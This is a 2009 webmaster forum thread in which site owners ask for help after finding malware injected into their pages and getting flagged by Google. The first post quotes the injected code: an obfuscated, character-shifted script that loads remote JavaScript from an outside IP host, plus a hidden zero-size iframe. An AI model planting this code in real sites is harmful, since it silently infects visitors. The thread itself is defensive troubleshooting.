homepage Welcome to WebmasterWorld Guest from 54.237.122.241
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
Forum Library, Charter, Moderators: phranque

Website Technology Issues Forum

    
Malware Traps?
mqcarpenter




msg:3898569
 12:32 pm on Apr 23, 2009 (gmt 0)

Not sure if this is the right place for this.

I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:

<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->

I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.

[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]

 

ebby




msg:3898590
 12:56 pm on Apr 23, 2009 (gmt 0)

This just happened to me also, any help would be greatly appreciated. Mine was a PunBB forum

ebby




msg:3898594
 1:05 pm on Apr 23, 2009 (gmt 0)

This is the exact same code found on my index and login php pages. EXACT. Not cool.

mqcarpenter




msg:3898720
 3:56 pm on Apr 23, 2009 (gmt 0)

Well I did not do it! lol

ebby




msg:3898752
 4:30 pm on Apr 23, 2009 (gmt 0)

what type of site was it?

neil665




msg:3899470
 11:14 am on Apr 24, 2009 (gmt 0)

Also had similar code added to a couple of sites recently,
'mysite.co.uk' and 'mysite.com'.
The 'mysite.co.uk' is a regional u.k. tourism site
and the 'mysite.com' is where i do my future development.

Both sites are on the same server located in the u.k.

Have now changed the passwords.

Regards

Neil

Mishkan




msg:3901097
 7:35 pm on Apr 26, 2009 (gmt 0)

Hi

I also had the same thing,

i deleted the codes and after 2 days it was up again on the index.php and login.php file on my site,

does anyone know what this is?

g1smd




msg:3901132
 8:59 pm on Apr 26, 2009 (gmt 0)

Looks like you have been hacked with code that does something nasty when a visitor looks at the page.

That sort of attack is getting much more common; wordpress and other similar products have been targeted several times.

There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.

neil665




msg:3902237
 9:01 am on Apr 28, 2009 (gmt 0)

The 'mysite.com' site was again attacked yesterday,
and google has blocked this site.

Regards Neil

lammert




msg:3902259
 9:55 am on Apr 28, 2009 (gmt 0)

Shared hosting or VPS/dedicated?

If shared hosting, move to another hosting company. With shared hosting you have only limited possibilities to close such holes and with shared hosting many times the problem is caused by the hosting provider rather then the website operator.

neil665




msg:3902984
 6:37 am on Apr 29, 2009 (gmt 0)

Using shared hosting,
does VPS provide a higher level of security.
Is it still open to hackers adding malicious code?

Regards Neil

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved